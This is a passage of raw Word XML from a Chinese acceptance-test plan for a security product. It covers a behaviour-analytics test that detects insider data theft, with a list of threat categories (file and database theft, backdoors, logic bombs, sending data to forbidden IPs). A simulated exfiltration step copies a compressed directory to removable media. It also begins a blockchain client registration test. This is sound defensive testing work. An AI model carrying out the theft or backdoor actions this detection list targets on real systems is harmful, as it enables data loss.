            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C7D4B2E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="753B13DB"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7675B3BD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DB9DE62" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9511B2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc2066524722"/>
      <w:bookmarkStart w:id="304" w:name="_Toc36487932"/>
      <w:r w:rsidRPr="00536672">
        <w:t>异常敏感操作行为</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="30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14F21050" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27D4A711"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241A0301" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>异常敏感操作检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="41777CF6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25688376" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35881AC3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>无需工具，安装测试过程要求手动操作即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2CE07E1D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2001C635"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7F1D94C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4D1111A4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B52FBD2"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79938698" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：在极端情况下，因内外部威胁原因，攻击者在获取到相关shell权限后，只使用系统自带的正常程序进行攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9F7739" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>常见的异常行为可以归纳成如下几项：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FAD7EE1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>非正常时间的操作执行；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE947EA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>单位时间片内的操作命令次数统计异常；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5978D577" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>时间片内的异常操作模式；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BA220EF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在现实的场景中，异常情况往往不是真实的威胁行为，而是因为业务场景的复杂行和人类行为的不可预测性导致的，在</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>真实业务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景中，异常威胁攻击类别如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D6171C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>机密文件窃取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61418667" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>数据库敏感数据窃取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CE1993" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>敏感数据/文件非法篡改（删除）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B7F56A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后门攻击（非法网络链路，非法shell接口，非法账户）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464EDB9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>潜伏炸弹</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4C1CC1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>禁止向特定I</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>地址发送敏感数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F80895" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>以上典型情况有因内部威胁导致的数据窃取，当前演示方案同时基于此场景进</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>行设计。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6E0842" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析使用采用机器学习算法基于用户行为模式进行异常行为检测，再通过用户状态行为跟踪的方式来对检测的异常进行威胁甄别，当机器学习算法引擎报异常且用户状态被标记</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成微信敏感</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>时，进行告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3F946E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="542E329A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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测试过程：在被保护机器上对一测试目录进行打包压缩，并复制移动到移动介质上，随后在相关机器上任意执行命令，确保执行的命令模式和被保护机器中当前登录用户的使用模式迥异，以此触发异常威胁告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B581457" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>另外，可通过策略设置限制对特定的ip地址发送敏感数据，一旦有操作违反该策略，用户行为分析可马上发现并报警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="598AE5D2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22DE97B9"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506F5133"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1030156F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409F9064"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447323C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FB30723" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc36487933"/>
      <w:bookmarkStart w:id="306" w:name="_Toc36573237"/>
      <w:bookmarkStart w:id="307" w:name="_Toc36630323"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>区块链防篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="0020259A">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w14:paraId="32258BF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="308" w:name="_Toc21249"/>
      <w:bookmarkStart w:id="309" w:name="_Toc36487934"/>
      <w:bookmarkStart w:id="310" w:name="_Toc36573238"/>
      <w:bookmarkStart w:id="311" w:name="_Toc36630324"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="308"/>
      <w:r w:rsidRPr="00536672">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="309"/>
      <w:bookmarkEnd w:id="310"/>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="6576D8FE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc36487935"/>
      <w:r w:rsidRPr="00536672">
        <w:t>注册账号</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>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16B3F666" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B6F81CF"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1FD3AD81" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>注册账号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3D35A347" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110053F1"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54A0F075" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在客户端页面注册账号，并登陆系统。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0A74A526" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DC5AE6A"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33C0E742"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15AA1FF9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F051EF"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19842155" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>地址：192.168.1.239:8100</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CFF75BE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="04B5B86E" wp14:editId="4A70F6CD">
                  <wp:extent cx="4104005" cy="1967230"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13970"/>
                  <wp:docPr id="107" name="图片 107" descr="Cli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lient1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1967230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
